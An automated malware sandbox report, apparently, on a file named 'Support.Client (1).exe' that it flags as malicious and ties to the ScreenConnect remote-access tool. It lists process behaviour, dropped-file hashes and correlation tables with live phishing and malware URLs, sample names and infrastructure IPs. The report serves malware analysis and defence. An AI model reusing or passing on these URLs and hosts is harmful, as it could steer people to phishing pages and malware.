                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:15
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:Support.Client (1).exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal54.evad.winEXE@19/75@2/2
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 85.7%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 62%
                                                                                                        • Number of executed functions: 209
                                                                                                        • Number of non-executed functions: 25
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 184.28.90.27, 52.168.117.173, 20.189.173.21
                                                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, cacerts.digicert.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                                                                        • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7516 because it is empty
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                        • VT rate limit hit for: Support.Client (1).exe
                                                                                                        TimeTypeDescription
                                                                                                        12:17:56API Interceptor62971x Sleep call for process: dfsvc.exe modified
                                                                                                        12:17:56API Interceptor1x Sleep call for process: Support.Client (1).exe modified
                                                                                                        12:17:57API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                        12:18:13API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                        No context
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        bg.microsoft.map.fastly.nethttps://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 199.232.214.172
                                                                                                        2024-2025_Open Enrollment4402462144024621.pdfGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        https://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        https://o000005496.photoshelter.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        https://webconference.protected-forms.com/XZmlBeUlkbExkNHYxS3piZldoaGJqTzUrV3RZK1BkOGZVMlRsRGFZcnlYbnJ1K3h1VjJEMnY1d0lXNFNQVmswcXFCTmFqczEyaHMyc3lwSUpvNnFFYlJLemVwaEpGbjRXVnVRRk93ZUxYY0dwRmhsZ010WmVrNTNVR0N0YkdCeTRnTHZMb043aXdiVFo5a25TNjZkVThLaW8wem41RTU3MUl5b2dxWjNpdjFLNWdRSmdxL2ZocGVvdDVBPT0tLVNLdmlEU1hLTGZIRW9VQ0YtLWFoQVVsMnk3VVFLbzBPZHpycUt6OEE9PQ==?cid=2178924675Get hashmaliciousKnowBe4Browse
                                                                                                        • 199.232.210.172
                                                                                                        http://googleads.g.doubleclick.net/aclk?sa=L&ai=CJF0hsbsNVNi_DIPR0AGqhIGYDPfOz9MFj-TFvsMB25uy0esBEAEg4_uTA1DMiaOOBWDN8N-A5ALIAQSpAgbEodTv6J0-qAMBmAQFqgSnAU_QL6NE73jlCJ7TFvA2kg2Ig3wrASDHwt7I6P2gJSz2wmCekvewEDUw1zPqYx0NADEmzairfw3ur1wkNI8P6teiwhlldXdj5OGBN4lmsCEDPv86I5o3eNVngnJfRiuDvxlWje20-VfTVoLEZHjLsyN8zQleVTsGbhHjd1BSHfxBMk8P6-QwvlL67TaFDfOyk-sIZEC0a7hK4DdrheQBo-5kNsgA7ijRoAYEgAfP_b4i&num=1&sig=AOD64_1QMErG-pSUGweRO5zdk0lMn9Ngwg&client=ca-pub-6219811747049371&adurl=http://nDmfN.toplogtrans.com.br%2Fcgi-bin%2F9224511553/9224511553/cGFydG5lcmhuZHVhbWVyQHB1cmVzdG9yYWdlLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        EXT_Transaction Details for Martibs -462fd4a1151861ecbc00b016e69e7825 (18.7 KB).msgGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        https://www.trendytechinsight.com/sxGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        https://bonzibuddy.org/Bonzi.zipGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        fp2e7a.wpc.phicdn.nethttps://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                                                                                                        • 192.229.221.95
                                                                                                        https://o000005496.photoshelter.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 192.229.221.95
                                                                                                        https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 192.229.221.95
                                                                                                        https://carrier.businessappdevs.com/Baa9NGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 192.229.221.95
                                                                                                        https://webconference.protected-forms.com/XZmlBeUlkbExkNHYxS3piZldoaGJqTzUrV3RZK1BkOGZVMlRsRGFZcnlYbnJ1K3h1VjJEMnY1d0lXNFNQVmswcXFCTmFqczEyaHMyc3lwSUpvNnFFYlJLemVwaEpGbjRXVnVRRk93ZUxYY0dwRmhsZ010WmVrNTNVR0N0YkdCeTRnTHZMb043aXdiVFo5a25TNjZkVThLaW8wem41RTU3MUl5b2dxWjNpdjFLNWdRSmdxL2ZocGVvdDVBPT0tLVNLdmlEU1hLTGZIRW9VQ0YtLWFoQVVsMnk3VVFLbzBPZHpycUt6OEE9PQ==?cid=2178924675Get hashmaliciousKnowBe4Browse
                                                                                                        • 192.229.221.95
                                                                                                        https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#&lt;EMAIL&gt;Get hashmaliciousUnknownBrowse
                                                                                                        • 192.229.221.95
                                                                                                        http://googleads.g.doubleclick.net/aclk?sa=L&ai=CJF0hsbsNVNi_DIPR0AGqhIGYDPfOz9MFj-TFvsMB25uy0esBEAEg4_uTA1DMiaOOBWDN8N-A5ALIAQSpAgbEodTv6J0-qAMBmAQFqgSnAU_QL6NE73jlCJ7TFvA2kg2Ig3wrASDHwt7I6P2gJSz2wmCekvewEDUw1zPqYx0NADEmzairfw3ur1wkNI8P6teiwhlldXdj5OGBN4lmsCEDPv86I5o3eNVngnJfRiuDvxlWje20-VfTVoLEZHjLsyN8zQleVTsGbhHjd1BSHfxBMk8P6-QwvlL67TaFDfOyk-sIZEC0a7hK4DdrheQBo-5kNsgA7ijRoAYEgAfP_b4i&num=1&sig=AOD64_1QMErG-pSUGweRO5zdk0lMn9Ngwg&client=ca-pub-6219811747049371&adurl=http://nDmfN.toplogtrans.com.br%2Fcgi-bin%2F9224511553/9224511553/cGFydG5lcmhuZHVhbWVyQHB1cmVzdG9yYWdlLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                        • 192.229.221.95
                                                                                                        https://www.trendytechinsight.com/sxGet hashmaliciousUnknownBrowse
                                                                                                        • 192.229.221.95
                                                                                                        https://bonzibuddy.org/Bonzi.zipGet hashmaliciousUnknownBrowse
                                                                                                        • 192.229.221.95
                                                                                                        https://mikkymax.comGet hashmaliciousUnknownBrowse
                                                                                                        • 192.229.221.95
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        EDGEtaGCIComGBla.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 213.210.9.89
                                                                                                        la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 77.107.70.202
                                                                                                        fvIqrxcfuL.exeGet hashmaliciousQuasarBrowse
                                                                                                        • 89.213.56.109
                                                                                                        la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 89.213.146.12
                                                                                                        arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 77.107.120.22
                                                                                                        JnC2t6WhUf.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 213.130.144.69
                                                                                                        mhmdm9Hb6i.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 213.130.144.69
                                                                                                        https://t.ly/nFp5iGet hashmaliciousUnknownBrowse
                                                                                                        • 213.130.145.203
                                                                                                        x.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                        • 89.213.177.177
                                                                                                        visabuilder.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                                                                                        • 213.130.145.42
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0ehttps://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 185.49.126.73
                                                                                                        Pmendon.ext_Reord_Adjustment.docxGet hashmaliciousCaptcha PhishBrowse
                                                                                                        • 185.49.126.73
                                                                                                        Factura de proforma.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 185.49.126.73
                                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                        • 185.49.126.73
                                                                                                        https://uxfol.io/p/b02d8c67/029f480aGet hashmaliciousUnknownBrowse
                                                                                                        • 185.49.126.73
                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                        • 185.49.126.73
                                                                                                        https://bonzibuddy.org/Bonzi.zipGet hashmaliciousUnknownBrowse
                                                                                                        • 185.49.126.73
                                                                                                        https://wetransfer.com/downloads/dfae2da4024c0a427ba385707deb5ffa20240620022822/9659fcGet hashmaliciousUnknownBrowse
                                                                                                        • 185.49.126.73
                                                                                                        Company Profile_pdf.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 185.49.126.73
                                                                                                        SUNNY (1).exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 185.49.126.73
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exeRechnung_10401.jsGet hashmaliciousScreenConnect ToolBrowse
                                                                                                          Rechnung_Datum_November 24_6957.jsGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            file.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                              file.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exeRechnung_10401.jsGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                  Rechnung_Datum_November 24_6957.jsGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                    file.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                      file.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1310720
                                                                                                                        Entropy (8bit):1.30738008913005
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrp:KooCEYhgYEL0In
                                                                                                                        MD5:307F546B6A33AC171548A41E7AF6175D
                                                                                                                        SHA1:149B3C2FB570AC19E99238FF74F6EAEF2F60ED11
                                                                                                                        SHA-256:F1C28BB8263C1CFAD7B181AB9D70C80284846B856FBAC578183368423A19AF45
                                                                                                                        SHA-512:2168245E861B1478151E78836BD70DBEA7A21F76464BBD91A9D901FF6B706FBE0FE3AAED8027AFB5D5C69779977058828BBC171EFE04B927A82A786D2FF0601E
                                                                                                                        Malicious:false
                                                                                                                        Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x62e4f6d9, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1310720
                                                                                                                        Entropy (8bit):0.4221509263502241
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
                                                                                                                        MD5:4E33C0EF5652B7180A4C0CFEF3C8652F
                                                                                                                        SHA1:222A7F60B10CBAEF4D2476325DCFB3F3FBAC1B3A
                                                                                                                        SHA-256:4C9A20AE0DB1B96E584A4412D94EFF65282FD9F01436012E36B6A0CE905DE39A
                                                                                                                        SHA-512:8CEA1733C84F326E2DECAC2731233FB65E214550E67F47511FCC55D4309540885B0ACFD418F7892F9AF36A243540C068E2E690EC094CD05A57C31D9EC0078717
                                                                                                                        Malicious:false
                                                                                                                        Preview:b...... .......A.......X\...;...{......................0.!..........{A.:....|}.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................7:....|....................5.:....|}..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):16384
                                                                                                                        Entropy (8bit):0.07680222831681127
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:wmXEYeo6uZA+Cejjn13a/kLzalqllcVO/lnlZMxZNQl:wmUzjuaKj53qwzaleOewk
                                                                                                                        MD5:D5FC361EF9B5DE4E3799554D5A31359A
                                                                                                                        SHA1:273D6677E84D0F01189C39080FC208C805FAC2E1
                                                                                                                        SHA-256:01E35810B9141EA5ED438D0EEE1A39307B34ED9F12CE9F74D039AE877E75FA14
                                                                                                                        SHA-512:82FF1D64F16B12E7D5823058A84DF3CF19C8E5787BDD887133B0072E33BB09A5FA13E7C3FBEF0DF6DAA1FEC3F07F16D230A5B384F5F9D9CB5AA02E0D25B538C0
                                                                                                                        Malicious:false
                                                                                                                        Preview::.......................................;...{..:....|}......{A..............{A......{A..........{A]..................5.:....|}.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):65536
                                                                                                                        Entropy (8bit):0.9203706383387072
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:MTFqPsBq1SoEYRsdXhrGXyf8QXIDcQvc6QcEVcw3cE/PgRgZ+HbHg/Jg+OgBCXEx:WQ3xR80BU/4jq0ozuiFuZ24IO83
                                                                                                                        MD5:73A4F7AC50906DD9D4A656178F82E59D
                                                                                                                        SHA1:27418C327BC7CCE26507BFC02135269A8CF3913C
                                                                                                                        SHA-256:F5ADAE46BC87DEF040049F841ABCB60870139DE097645E99EDAABAF92D0E2EE4
                                                                                                                        SHA-512:E918FF3929F78A5BF1827983ACD91778570805F9765E4D6599C8D8A296333487014BD5C9B0DC1572B8BABD3C907B92DB116E4B168658561D6C19F30DCFEE2011
                                                                                                                        Malicious:false
                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.9.9.1.8.7.7.0.4.3.1.2.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.9.9.1.8.7.9.0.8.9.9.9.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.8.b.9.3.a.c.-.d.e.1.2.-.4.9.5.d.-.a.c.b.1.-.2.5.0.1.a.9.c.7.5.6.b.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.5.2.4.4.1.2.-.d.c.2.3.-.4.f.5.a.-.b.8.a.7.-.6.9.7.a.e.4.d.c.b.a.c.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.u.p.p.o.r.t...C.l.i.e.n.t. .(.1.)...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.d.8.-.0.0.0.1.-.0.0.1.4.-.d.8.2.1.-.b.c.f.a.e.f.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.1.8.2.0.5.6.4.5.7.e.9.7.c.1.a.1.b.7.f.d.5.e.0.b.6.5.d.a.6.3.e.0.0.0.0.f.f.f.f.!.0.0.0.0.2.2.f.7.0.4.d.2.9.9.c.0.1.6.0.0.3.8.9.6.5.a.d.4.1.d.6.a.4.8.6.e.5.c.1.2.5.f.5.5.!.S.u.p.p.o.r.t...C.l.i.e.n.t. .(.1.
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Wed Nov 13 17:17:58 2024, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):76540
                                                                                                                        Entropy (8bit):1.7859200075936994
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:w9ikcpjX/+H7EOhI/E3aZk6Tt+tIG0x7zw5kstlzgmiYnjGH:eikMCbLhI/SV6TtoIG0xw5VDHnjG
                                                                                                                        MD5:8BCA6EC30701E221E1AFC636C2DC4417
                                                                                                                        SHA1:CF4035F23EF459D42279143DF8FE7635B6B69B75
                                                                                                                        SHA-256:4B45654A8CD0E50BFA54E72E32220D96274AFD9B2455FC4AB9A7D3AF3A64834E
                                                                                                                        SHA-512:95376049C61C5C73B5B1F98BC57B39C9809BC887582E4AF99ACF32D8FF8EAD0C5FE6358DC4C99E899DB435C92481DBB13168DFEE35725A8ED5F9174ADC3090F5
                                                                                                                        Malicious:false
                                                                                                                        Preview:MDMP..a..... .......F.4g....................................$....;..........T.......8...........T............!..|........... ...........................................................................................eJ..............GenuineIntel............T...........C.4g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8362
                                                                                                                        Entropy (8bit):3.700996079844906
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:R6l7wVeJie6n6Y9PSU9RQvgmfSt5prO89b5ysfJJTm:R6lXJ76n6YVSU9RQvgmfStD5xfJA
                                                                                                                        MD5:80F6535EE198483163E4CE698E1D9552
                                                                                                                        SHA1:3E12E771C28708222C934AF6735D405ED60BD9E1
                                                                                                                        SHA-256:B20FE579EFA20FA734417043E7CADC09BFC183F78959850165CC64402104E266
                                                                                                                        SHA-512:03828C9E5F3CF2EA29009A9E7FB5AE1568F6CC3D638B06FFB8A40316C6D3CCA623570BBB8E9C072E5B9EC90AEB9FFBBEE85D09B82C0AB66F470F2871977F6004
                                                                                                                        Malicious:false
                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.7.2.<./.P.i.
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4633
                                                                                                                        Entropy (8bit):4.487603106013009
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwWl8zsyJg77aI9BuWpW8VYsYm8M4JELF5j+q8RyvfO3ZTd:uIjfAI7nP7VQJYjPvG3ZTd
                                                                                                                        MD5:E991FCCD3C464A35413056998746A27D
                                                                                                                        SHA1:28FC77D96F53382C57EC20EF277B64A9065F5BB6
                                                                                                                        SHA-256:B9F85C83AE85100B7EB725DC169894F43E569E6D5867D7E15F860259E4D2F707
                                                                                                                        SHA-512:8C148FBF23296C6AD4200AA94CD1E70918E0398557271BE8CF09D8183919899602D445357F65D1E3FA134E275CBB66525ECF119B4BA64DD1CDAF03482D3F016F
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="586580" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):79200
                                                                                                                        Entropy (8bit):3.0323023950254426
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:WPAhVgQCIdw8B9S8Ij40ITQi0p1Eqpni4:WPAhVgQCIdw8B9S8Ij40ITQi0p1zpni4
                                                                                                                        MD5:253FEA2CB92AA57C4EC9C4EE7031E56E
                                                                                                                        SHA1:AF0DE0BADC055E84B4689151A2E629C2A007377E
                                                                                                                        SHA-256:26ACAD78FD9CC878406EC2CAC7F845D9A6D0843A9C6740FE3F6E99EDC9527044
                                                                                                                        SHA-512:2A98BB3F31492F2A3CD4EF970A2071B4CD416D359758BD5E7CB00BE7913ECDA5A10F5BDFE7DDC663E1F6D7F614EFE4E414667088F0342A35C5CE4F3715B0B56F
                                                                                                                        Malicious:false
                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):13340
                                                                                                                        Entropy (8bit):2.6852368954104944
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:TiZYWWBHSZYJY2WjUrHfYEZtytEix4MfLwusqarPnMN2uIKDR3:2ZDVOjerarPnMN25K13
                                                                                                                        MD5:6578B6BD175D4B10A44B705963AF0981
                                                                                                                        SHA1:B7D146FDF16EF1BAF40BD0A442EFEE74009ED17A
                                                                                                                        SHA-256:D0C571BFF8A2089DD805A030E9E21C52FF5F558197C23C29661F7E77817C76FF
                                                                                                                        SHA-512:00C1275256809BFF8E7AB02FC70AB42B2EDFF817068253D68262104124E7DDD19487CBF7DD3AF1BC31F4ED9CE6ACD3751AE125B6DCE79DE8D374677C5CB05D39
                                                                                                                        Malicious:false
